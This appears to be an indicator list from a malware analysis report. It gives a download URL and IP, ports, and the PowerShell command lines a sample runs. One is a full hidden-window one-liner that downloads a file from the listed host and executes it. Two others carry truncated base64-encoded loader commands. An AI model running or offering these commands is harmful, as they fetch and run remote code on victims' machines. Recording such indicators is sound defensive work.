Technical Information
- http://124.220.2.168:80/2.pdf as %temp+/2.pdf%
- '12#.#20.2.168':80
- '12#.#20.2.168':9003
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http://124.220.2.168:80/2.pdf',$env:temp+'/2.pdf');Start-Process $env:temp'/2.pdf'' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASA...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASA...